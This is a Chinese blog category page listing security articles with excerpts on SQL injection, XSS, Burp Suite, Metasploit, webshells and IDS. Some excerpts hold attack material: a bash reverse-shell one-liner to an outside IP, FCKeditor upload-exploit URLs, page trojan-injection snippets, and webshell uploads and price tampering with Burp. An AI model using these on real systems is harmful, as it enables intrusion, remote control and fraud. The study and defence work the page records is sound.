安全相关
文章平均质量分 63
起个名字被占了
用代码解放双手
展开
-
JavaScript常用代码集合
事件源对象event.srcElement.tagName event.srcElement.type 捕获释放 event.srcElement.setCapture(); event.srcElement.releaseCapture(); 事件按键event.keyCode event.shiftKey event.altKey event.ct转载 2014-07-08 18:39:08 · 825 阅读 · 0 评论 -
实例讲解SQL注入
最近整理一些基础知识,看到这篇文章,介绍的非常详细,转载过来收藏,也为了大家能够看到这篇优秀的文章。一位客户让我们针对只有他们企业员工和顾客能使用的企业内网进行渗透测试。这是安全评估的一个部分,所以尽管我们之前没有使用过SQL注入来渗透网络,但对其概念也相当熟悉了。最后我们在这项任务中大获成功,现在来回顾一下这个过程的每一步,将它记录为一个案例。“SQL注入”是一种利用未过滤/未审核用户输入的攻击方转载 2015-04-19 00:03:15 · 611 阅读 · 0 评论 -
TCP三次握手和四次握手以及SYN攻击
相对于SOCKET开发者,TCP创建过程和链接折除过程是由TCP/IP协议栈自动创建的.因此开发者并不需要控制这个过程.但是对于理解TCP底层运作机制,相当有帮助.而且对于有网络协议工程师之类笔试,几乎是必考的内容.企业对这个问题热情之高,出乎我的意料:-)。有时上午面试前强调这个问题,并重复讲一次,下午几乎每一个人都被问到这个问题。因此在这里详细解释一下这两个过程。TCP三次握手所谓三次握手(Th转载 2015-04-23 21:03:47 · 1121 阅读 · 0 评论 -
FCK上传总结
适合asp站点 1、浏览查看文件 http://127.0.0.1/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://127.0.0.1/fckeditor/editor/filemanager/connectors/asp/connector.asp 2、创建asp.asp文件夹 http:转载 2015-05-05 22:41:09 · 1572 阅读 · 0 评论 -
爬取某在线恶意软件仓库病毒文件进行分析
前段时间,因为最近工作需要,要收集一些木马文件,于是就找到了一个网站:VirusShare.com,在这里,研究者可以提交并获得恶意软件的样本。该网站实时更新来自全球的恶意文件样本。本来打算自己动手下载呢,但是特征文件更新比较慢,等好久才会出现一个我想要的文件。刚好当时也在写Python的爬虫,就写了一个爬虫来爬。后来实验的效果果然不错,一晚上就把我一星期的工作量就完成了。又一次说明一个道理:代码解原创 2015-06-01 13:27:47 · 3614 阅读 · 8 评论 -
常见的页面恶意代码及利用
一:框架挂马 二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀 四:body挂马 五:隐蔽挂马 top.document.body.innerHTM原创 2014-07-10 23:23:58 · 1380 阅读 · 1 评论 -
DomXSS以及绕过浏览器检测机制方法总结
今天继续研究了一下PKAV“心伤的瘦子”的XSS系列教程,收获挺大的,这里主要记录下来,以备忘记! 下面是这个系列教程的截图,可以在这里看到,当让,每一个知识知识点,都可以在这里(传送门)得到复现。作为程序员,会让你意思到自己以前的编码方式中有诸多的不足,作为安全研究者,深深地感觉到,原来还可以这么玩….昨天的知识点忘记整理了,先吧今天的写上,以后再补: **DOM_XSS之iframe标签的变原创 2015-06-27 02:44:56 · 8944 阅读 · 0 评论 -
宽字节编码类型的XSS
今晚又看了一遍PKAV-心上的瘦子写的xss腾讯系列的例子,收获挺大的,其中对宽字节注入有了更深的了解,又查找了一些相关的资料,整理一下,以备以后查阅 参考文档: http://book.2cto.com/201301/14515.html http://itindex.net/detail/47408-xss-%E5%AD%A6%E4%B9%A0-xss http://ww原创 2015-06-25 00:40:52 · 3678 阅读 · 0 评论 -
Hacking Team 事件
昨天上午看到圈子里有人在讨论hacking team被黑引起的那个flash漏洞,准备晚上研究一下呢。下午在教室上自习备考期末,无奈对课本上的知识一点都不敏感,就刷刷微博,看到圈子里爆炸似的转载Hacking Team 400G数据流出的消息。更有手快者已经进行了分析。这400G数据像一颗重磅炸弹一样引爆了国内的安全圈子。我也在第一时间赶回宿舍,操起我的pc小水管开始下载,不过当然不是那400G了,原创 2015-07-08 22:17:53 · 1017 阅读 · 0 评论 -
防火墙与入侵检测知识整理 (二)
最近整理点防火墙和入侵检测系统的东西,记录在这里。入侵检测系统:(intrusion detection system,简称“IDS”)是一种对网络传输进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于,IDS是一种积极主动的安全防护技术。下面是一张入侵检测系统的基本模型简单的介绍一下图中模块的功能:探测器:又称数据收集器,负责收集入侵原创 2015-07-01 20:43:19 · 1861 阅读 · 0 评论 -
防火墙与入侵检测知识整理 (一)
最近整理点防火墙和入侵检测系统的东西,记录在这里。防火墙:是一种高级访问控制设备,置于不同的网络安全域之间的一些列部件的组合,它是不同网络安全域间通信流的唯一通道,能根据企业有关的安全策略控制(允许、拒绝、监视、记录)进出网络的访问行为。防火墙主要面临的安全威胁:通过更改防火墙配置参数和其它相关安全数据而展开的攻击攻击者利用高层协议和服务对内部受保护网络或主机进行的攻击绕开身份认证和鉴别机制原创 2015-07-01 20:13:18 · 8178 阅读 · 0 评论 -
域传送漏洞总结
抗战纪念日放了3天假,本来想回家呢,有个同学带着女朋友来学校玩,就只能在学校等他们了,刚好趁着这段时间,仔细学习了一下域传送漏洞,网上很多资料,这里整理只是为了做一个记录,加深印象,防止自己忘记…0x01:什么事域传送漏洞:DNS区域传送(DNS zone transfer)指的是一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库。这为运行中的DNS服务提供了一定的冗余度,其目的是原创 2015-09-04 22:54:59 · 2530 阅读 · 1 评论 -
Lynis基线检测使用解析
最近要做企业级的基线检测,虽然已经有了比较成熟的基线检测工具,但是搜索的时候看到Lynis这款工具,以前接触过,不过没有自己研究,刚好趁这个机会,学习一下这款工具的使用。 介绍 Lynis是一款开源的安全审计工具。功能主要是对Unix / Linux系统进行基线检测。 除了程序原有的配置外,同时也可以根据需要对配置文件的定制安装 下载地址:https://github.c原创 2015-09-12 10:43:12 · 8147 阅读 · 0 评论 -
一次后门清除
最近学校的一个网站被挂了黑链,被叫去做技术支持= =! 简单介绍一下具体情况:访问网站根目录下的一个文件:http://www.demo.com/yule 显示的是黑链地址,但是我登录到服务器上定位到根目录的时候却找不到这个文件。开始以为是文件设置了隐藏,不过修改之后还是不可以。然后怀疑黑客在服务器上做了虚拟目录,然后全盘搜索文件“yule”,奇怪的是全部盘符下都没找到这个文件。真是日了狗原创 2015-10-30 22:28:48 · 5512 阅读 · 0 评论 -
逆向工程(一):汇编、逆向工程基础篇
文章转自Freebuf,作者VillanCh,很精彩,担心下次再找,暂时保留下来以备学习查阅。如果你也喜欢,请联系作者转载!============================================逆向工程(一):汇编、逆向工程基础篇VillanCh2015-11-24共19147人围观,发现9个不明物体周边系统安全本文原创作者:V转载 2015-11-24 20:38:26 · 2203 阅读 · 0 评论 -
反弹shell的十种姿势
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(co转载 2016-03-07 11:44:04 · 2240 阅读 · 0 评论 -
利用NetFuke进行内网嗅探
利用NetFuke进行内网嗅探今天在论坛里看到一哥们利用工具嗅探隔壁女神信息并最终搞定女神所有的隐私信息的故事,哈哈,感觉挺好玩的,晚上刚好没事,就研究看一番。使用工具:NetFuke嗅探工具 测试环境:VMware平台、xp虚拟机、Kali虚拟机在使用NetFuck之前,电脑上必须安装的一个插件是Winpcap,这是一款基于windows平台下一个免费,公共的网络访问系统。开发winpcap这个原创 2015-03-18 01:23:51 · 32666 阅读 · 3 评论 -
从信息收集到入侵提权
通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的.阅读本文你会学到以下内容:1.渗透测试前的简单信息收集。2.sqlmap的使用3.nmap的使用4.nc反弹提权5.linux系统的权限提升6.backtrack 5中渗透测试工具nikto和w3af的使用等.假转载 2014-12-22 14:10:42 · 1209 阅读 · 0 评论 -
burp suite 使用
Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。本文将做一个Burp Suite完全正的演练,主要讨论它的以下特点.1.代理--Burp Suite带有一个代理,通过默认端口8080上运行,使用这个代理,我们可以截获并修改从客户端到web应用程序的数据包.转载 2014-10-25 21:53:43 · 769 阅读 · 0 评论 -
sqlmap一个简单的例子
微博杂志社区注册登录听潮门户 - ListenTide搜索 门户论坛分站应用公益关于注册历程帮助常规渗透CMS渗透 内网渗透 Linux渗透 WAF突破权限提升 无线安全 移动安全 社会工程安全运维转载 2014-11-11 22:25:08 · 478 阅读 · 0 评论 -
跨站脚本攻击详解
1 前言近年来,随着Web2.0的大潮,越来越多的人开始关注Web安全,新的Web攻击手法层出不穷,Web应用程序面临的安全形势日益严峻。跨站脚本攻击(XSS)就是常见的Web攻击技术之一,由于跨站脚本漏洞易于出现且利用成本低,所以被OWASP开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)列为当前的头号Web安全威胁。转载 2014-11-12 23:10:51 · 1055 阅读 · 0 评论 -
SQL注入攻击研究
1.1 SQL注入攻击研究 “注入攻击”这个词在网络上已经是屡见不鲜了。当入侵者准备入侵一台主机时,通常情况下首先查看这台服务器上有无动态网页的Web服务,并且这些动态网页是否存在漏洞。如果存在漏洞,则可以通过一些手段来得到管理员的密码,甚至是整台服务器的控制权。在这些漏洞中比较常见且容易上手的一种攻击方式就是SQL注入攻转载 2014-10-09 23:37:58 · 2602 阅读 · 0 评论 -
google hacking
Google Hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉Google Hacking其实并非如此简单。google hacking的简单实现 记得以前看见过一篇文章写的就是简单的通过用ww转载 2014-10-11 01:03:01 · 613 阅读 · 0 评论 -
burpsuite修改价格,burpsuite之免费购买虚拟空
本人文笔不好,其实这次渗透过程也很艰难曲折的,只是个人文笔问题表达的不太生动,大家见谅!!今天给大家讲解下burpsuite应用,这个东西我在咱们这里看用着比较少,今天我就来给大家来讲解下。前两天我在淘宝上找了个空间,但我又不想花钱,怎么办呢?结果有了下文。 于是我就在他那个网站注册了个会员,然后左看看右看看做一些测试比较繁琐我就不一一讲述了。转载 2014-10-28 17:02:36 · 6683 阅读 · 1 评论 -
tcpdump详细用法
1. TCPDump介绍 TcpDump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。tcpdump就是一种免费的网络分析工具,尤其其提供了源代码,公开了接口,因此具备很强的可扩展性,对于网络维护和入侵者都是非常有用的工具。tcpdump存在于基本的FreeB转载 2014-10-10 22:29:45 · 408 阅读 · 0 评论 -
Burpsuite改包上传拿webshell,抓包上传拿webshell详细版
Burpsuite改包上传拿webshell,抓包上传拿webshell详细版 很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。然后找了篇大大写的Burpsiute截断上传拿webshell的科普帖看了看,然后去实践了一下。 在后台上传图片的地方添加xxx.jpg 图片 打开burpsiute进入proxy后进转载 2014-10-28 17:07:34 · 12388 阅读 · 0 评论 -
Web攻防系列教程之 PHP + Mysql注入攻防实战
摘要:随着Web应用的高速发展和技术的不断成熟,对Web开发相关职位的需求量也越来越大,越来越多的人加入了Web开发的行列。但是由于程序员的水平参差不齐或是安全意识太低,很多程序员在编写代码时仅考虑了功能上的实现,很少或是根本没有考虑应用的安全性问题。这就导致了很多应用都存在不同程度的安全漏洞。SQL注入便是其中的一种。随着Web应用的高速发展和技术的不断成熟,对Web开发相关职位的需求量也越转载 2014-10-30 22:54:35 · 596 阅读 · 0 评论 -
Sqlmap渗透
最近在研究WEB渗透方向的内容,看了很多的MS**-*之类的微软漏洞,就寻思着能不能利用MSF自动化工具进行自动话的批量扫描。对一个网段中的所有主机的进行全模块的扫描。遇到的第一个问题就是postgresql的安装和集成问题。下面是自己整理的安装过程,做一下学习笔记。我的机器是Red Hat EnterPrice Linux AS5 。安装postgre转载 2014-10-16 00:40:07 · 2173 阅读 · 0 评论 -
metasploit 常用指令
svn update #升级 ./msfweb #Web接口127.0.0.1:55555。. ./msfconsole #字符下的Console。 help #帮助 show #显示选项 search #搜索名字 use #使用漏洞 show options #显示选项 set #设置选项 show payloads #显示装置 set转载 2014-11-25 23:52:21 · 1000 阅读 · 0 评论 -
一些常见的重置密码漏洞分析整理
0x00 前言一般的密码重置的设计都是分为以下四步的:1.输入账户名2.验证身份3.重置密码4.完成 通常漏洞是会存在于2或者3步骤中,下面来看看常见的一些重置密码漏洞的方式。0x01 爆破类型1 这种重置密码是最多见最容易出现的一类,那就是手机验证码爆破从而重置密码。WooYun: 爱周游任意用户密码重置及 XSS漏洞WooYun: 麦包包转载 2014-10-18 11:50:21 · 791 阅读 · 0 评论 -
MySQL数据库5.X版本基本手工注入总结
根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话webshell。当拿到一个MySQL的注入点的时候,我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时,是不支持union select联合查询的;当MySQL版本大于5.0时,有个默认数据库information_schema转载 2014-11-20 20:40:09 · 1470 阅读 · 0 评论 -
How to do sql injections with SQLMAP
--------书写只是为了更好的思考 By:PgHook0x1 前面的废话0x2 传统的手工 第一步、判断是否存在注入点 第二步、得到数据库的消息0x3、sqlmap 传统用法 1、枚举数据库 2、列出数据库中转载 2014-11-20 20:55:12 · 654 阅读 · 0 评论 -
Sqlmap常用指令
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名sqlmap -原创 2014-11-06 01:36:39 · 5191 阅读 · 0 评论 -
关于webshell
什么是webshell1.webshell简介webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至转载 2014-11-27 20:25:09 · 2245 阅读 · 0 评论 -
ssh建立后门的两种方法
以前看到过,但是今天找了很久才找到。所以做一下截图,以备下次忘记能快速找到原创 2016-03-07 12:18:20 · 2121 阅读 · 1 评论